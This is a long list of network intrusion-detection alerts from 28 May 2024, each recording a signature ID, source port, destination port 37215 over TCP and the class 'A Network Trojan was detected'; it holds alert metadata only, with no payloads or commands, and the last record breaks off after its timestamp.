          Timestamp:05/28/24-14:46:54.178426
          SID:2835222
          Source Port:53012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.727821
          SID:2829579
          Source Port:57980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.087352
          SID:2829579
          Source Port:55738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.807458
          SID:2835222
          Source Port:46462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943970
          SID:2835222
          Source Port:48046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.510370
          SID:2835222
          Source Port:36360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.485428
          SID:2829579
          Source Port:50688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.592164
          SID:2829579
          Source Port:38414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.550643
          SID:2835222
          Source Port:33472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.710999
          SID:2835222
          Source Port:42792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.336917
          SID:2835222
          Source Port:42590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.744441
          SID:2835222
          Source Port:42550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.369140
          SID:2829579
          Source Port:37126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.189026
          SID:2835222
          Source Port:38792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.327888
          SID:2829579
          Source Port:35600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.610545
          SID:2835222
          Source Port:56032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.809840
          SID:2829579
          Source Port:34114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.152165
          SID:2829579
          Source Port:51062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.336927
          SID:2835222
          Source Port:59310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.939408
          SID:2829579
          Source Port:34166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.176635
          SID:2829579
          Source Port:43996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922097
          SID:2829579
          Source Port:49618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.593011
          SID:2835222
          Source Port:51162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923114
          SID:2829579
          Source Port:37900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.605209
          SID:2835222
          Source Port:60206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195669
          SID:2835222
          Source Port:45118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.605548
          SID:2829579
          Source Port:57306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.984369
          SID:2835222
          Source Port:34474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.336992
          SID:2835222
          Source Port:41534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.877827
          SID:2835222
          Source Port:47316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.151170
          SID:2829579
          Source Port:32950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178037
          SID:2829579
          Source Port:57268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922038
          SID:2835222
          Source Port:47490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.188458
          SID:2835222
          Source Port:33922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.341243
          SID:2829579
          Source Port:39726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.730802
          SID:2829579
          Source Port:38212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.019404
          SID:2829579
          Source Port:47258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.243633
          SID:2835222
          Source Port:49966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.949883
          SID:2829579
          Source Port:57898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.210728
          SID:2835222
          Source Port:32834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.685508
          SID:2835222
          Source Port:44404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.141725
          SID:2835222
          Source Port:38922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.271945
          SID:2829579
          Source Port:59280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214819
          SID:2835222
          Source Port:34538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.812391
          SID:2835222
          Source Port:58470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.361397
          SID:2835222
          Source Port:42808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.890689
          SID:2835222
          Source Port:44862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.085349
          SID:2829579
          Source Port:36364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.474469
          SID:2835222
          Source Port:50122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.743535
          SID:2829579
          Source Port:52080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.062371
          SID:2835222
          Source Port:37062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594872
          SID:2835222
          Source Port:40374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708465
          SID:2835222
          Source Port:53828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.736727
          SID:2835222
          Source Port:34206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338637
          SID:2835222
          Source Port:49230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.715842
          SID:2829579
          Source Port:46282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.977931
          SID:2829579
          Source Port:42896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.977113
          SID:2829579
          Source Port:42732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.989591
          SID:2835222
          Source Port:39516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.537375
          SID:2835222
          Source Port:41248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.473685
          SID:2829579
          Source Port:51292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.046064
          SID:2829579
          Source Port:55874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.745679
          SID:2829579
          Source Port:56446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.153412
          SID:2835222
          Source Port:36440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.463012
          SID:2835222
          Source Port:38540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.269599
          SID:2835222
          Source Port:33328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.273185
          SID:2829579
          Source Port:41850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.772331
          SID:2835222
          Source Port:48306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.560183
          SID:2835222
          Source Port:48548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.650124
          SID:2829579
          Source Port:45448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.664325
          SID:2835222
          Source Port:36126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325866
          SID:2835222
          Source Port:46452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195736
          SID:2835222
          Source Port:35420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.297607
          SID:2829579
          Source Port:56340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.847642
          SID:2835222
          Source Port:48448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.214818
          SID:2835222
          Source Port:59882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.635601
          SID:2829579
          Source Port:38444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.176459
          SID:2829579
          Source Port:43408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.183402
          SID:2835222
          Source Port:40448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.334680
          SID:2835222
          Source Port:46008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.268712
          SID:2829579
          Source Port:42798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.550705
          SID:2829579
          Source Port:37390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.953814
          SID:2829579
          Source Port:49162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.185987
          SID:2835222
          Source Port:51178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.337871
          SID:2835222
          Source Port:36256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.159728
          SID:2835222
          Source Port:39796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.841431
          SID:2835222
          Source Port:41286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.874704
          SID:2829579
          Source Port:33234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.332652
          SID:2835222
          Source Port:58812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.849303
          SID:2835222
          Source Port:51308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.115764
          SID:2835222
          Source Port:42100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.752114
          SID:2835222
          Source Port:55574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324121
          SID:2829579
          Source Port:56036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.513714
          SID:2835222
          Source Port:52270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.684562
          SID:2829579
          Source Port:44944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.608528
          SID:2835222
          Source Port:57440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.979056
          SID:2835222
          Source Port:40164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.150782
          SID:2829579
          Source Port:43234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.267930
          SID:2835222
          Source Port:59146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.033400
          SID:2835222
          Source Port:54506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.147800
          SID:2829579
          Source Port:50948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.989424
          SID:2835222
          Source Port:43532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.724200
          SID:2835222
          Source Port:51254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196618
          SID:2835222
          Source Port:48794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328535
          SID:2829579
          Source Port:43472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.190308
          SID:2829579
          Source Port:37642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.266479
          SID:2829579
          Source Port:49412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.115936
          SID:2835222
          Source Port:58356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.491302
          SID:2829579
          Source Port:60314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.213590
          SID:2835222
          Source Port:60410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.551151
          SID:2829579
          Source Port:49508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.625763
          SID:2829579
          Source Port:42712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.962711
          SID:2835222
          Source Port:37416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.032998
          SID:2829579
          Source Port:42528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.809215
          SID:2829579
          Source Port:60678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.141811
          SID:2835222
          Source Port:35672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.687446
          SID:2835222
          Source Port:51966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.945501
          SID:2829579
          Source Port:57028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.372592
          SID:2829579
          Source Port:58624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.722002
          SID:2829579
          Source Port:35270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.808251
          SID:2829579
          Source Port:52336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.744115
          SID:2829579
          Source Port:44512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272760
          SID:2835222
          Source Port:57340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.339669
          SID:2835222
          Source Port:52052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.690073
          SID:2835222
          Source Port:55324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.741681
          SID:2829579
          Source Port:43356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.116771
          SID:2829579
          Source Port:50006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.115920
          SID:2835222
          Source Port:38434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.147381
          SID:2835222
          Source Port:60140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.703835
          SID:2829579
          Source Port:59058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.689903
          SID:2829579
          Source Port:58146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.204811
          SID:2835222
          Source Port:36508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.208148
          SID:2835222
          Source Port:35304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.266517
          SID:2835222
          Source Port:54890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.470924
          SID:2835222
          Source Port:53576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.223510
          SID:2829579
          Source Port:58256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.678311
          SID:2829579
          Source Port:43162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.845769
          SID:2829579
          Source Port:34356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.185850
          SID:2835222
          Source Port:60370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.208274
          SID:2829579
          Source Port:41432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.604852
          SID:2835222
          Source Port:58124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.891213
          SID:2835222
          Source Port:38296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.669990
          SID:2829579
          Source Port:52388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.713540
          SID:2829579
          Source Port:57056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202854
          SID:2829579
          Source Port:40562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.778442
          SID:2835222
          Source Port:49180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.607930
          SID:2835222
          Source Port:40494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.173514
          SID:2835222
          Source Port:40124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.273190
          SID:2829579
          Source Port:59938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.903341
          SID:2829579
          Source Port:41566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.813682
          SID:2835222
          Source Port:60626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.238149
          SID:2835222
          Source Port:53388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.632104
          SID:2835222
          Source Port:55222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.204788
          SID:2835222
          Source Port:50136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.237487
          SID:2829579
          Source Port:42526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.960199
          SID:2829579
          Source Port:52282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.774277
          SID:2835222
          Source Port:35864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.462956
          SID:2829579
          Source Port:45752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652245
          SID:2835222
          Source Port:55738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.985560
          SID:2829579
          Source Port:56490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.874724
          SID:2829579
          Source Port:36882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.284279
          SID:2835222
          Source Port:59506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.841328
          SID:2835222
          Source Port:50128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.434300
          SID:2829579
          Source Port:56236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.337599
          SID:2835222
          Source Port:59548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.921030
          SID:2829579
          Source Port:34098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.547549
          SID:2835222
          Source Port:52128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.484799
          SID:2835222
          Source Port:60756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.745933
          SID:2835222
          Source Port:38504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.474187
          SID:2835222
          Source Port:57810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.656192
          SID:2829579
          Source Port:52688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202316
          SID:2835222
          Source Port:49670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.294758
          SID:2829579
          Source Port:47694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.592108
          SID:2835222
          Source Port:53324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271634
          SID:2835222
          Source Port:49342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202993
          SID:2829579
          Source Port:60562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.402566
          SID:2829579
          Source Port:43296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.876056
          SID:2835222
          Source Port:58920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.736825
          SID:2829579
          Source Port:34134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.887003
          SID:2829579
          Source Port:50752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.420549
          SID:2829579
          Source Port:47476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.650282
          SID:2835222
          Source Port:44458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.123806
          SID:2835222
          Source Port:41528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.326695
          SID:2829579
          Source Port:53034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.327807
          SID:2835222
          Source Port:59610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.229487
          SID:2835222
          Source Port:60370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.847495
          SID:2835222
          Source Port:57980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.330064
          SID:2829579
          Source Port:45024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.848491
          SID:2829579
          Source Port:43470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.115804
          SID:2835222
          Source Port:54666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.886347
          SID:2829579
          Source Port:41390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.337193
          SID:2829579
          Source Port:32818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.116997
          SID:2829579
          Source Port:57548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.812443
          SID:2835222
          Source Port:36032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.190388
          SID:2835222
          Source Port:49110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497660
          SID:2835222
          Source Port:57790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.803302
          SID:2829579
          Source Port:42828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.160098
